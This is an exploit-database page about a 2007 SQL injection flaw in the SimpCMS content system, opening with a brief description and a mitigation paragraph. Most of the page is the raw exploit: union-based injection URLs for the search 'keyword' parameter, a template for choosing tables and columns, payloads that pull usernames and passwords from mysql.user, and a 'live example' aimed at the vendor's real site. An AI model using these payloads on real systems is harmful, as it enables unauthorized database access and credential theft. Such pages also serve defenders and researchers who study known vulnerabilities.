header-logo
Suggest Exploit
vendor:
SimpCMS
by:
ú Cold z3ro
N/A
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: SimpCMS
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE: a:simpcms:simpcms
Metasploit:
Other Scripts:
Platforms Tested:
2007

SimpCMS <= all Remote SQL Injection Vulnerability

The SimpCMS website is vulnerable to remote SQL injection. By manipulating the 'keyword' parameter in the search area, an attacker can inject malicious SQL code and retrieve sensitive information from the database. The vulnerability allows union-based SQL injection, enabling the attacker to extract data from different database tables. Examples of queries that can be executed are provided in the exploit section.

Mitigation:

To mitigate the vulnerability, the vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Users are advised to update to the latest version of SimpCMS that includes patches for this vulnerability.
Source

Exploit-DB raw data:

SimpCMS <= all Remote SQL Injection Vulnerability


Found By : ú Cold z3ro , http://www.hackteach.org/


Script : http://www.simpcms.com/


====================================

Exploit :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

OR

/index.php?site=search

in search area insert your query

$query = 1)'/**/union/**/select/**/0,1,2,3,$COLUMN,5,6/**/from/**/$TABLE/*

$TABLE = "categories" OR "news" OR "mysql.user" OR "mysql.db" OR 
"information_schema.tables"

$COLUMN = "name" OR "id" OR "username" OR "password"

Examples :

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

1 ) From $TABLE categories :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

2 ) From $TABLE news :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,id,5,6/**/from/**/news/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

3 ) From $TABLE mysql.user :

/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,username,5,6/**/from/**/mysql.user/*
/index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,password,5,6/**/from/**/mysql.user/*

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

====================================

Live Example :

http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1)'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/*

# milw0rm.com [2007-09-16]

Navigation

Suggest Exploit

Services By CQR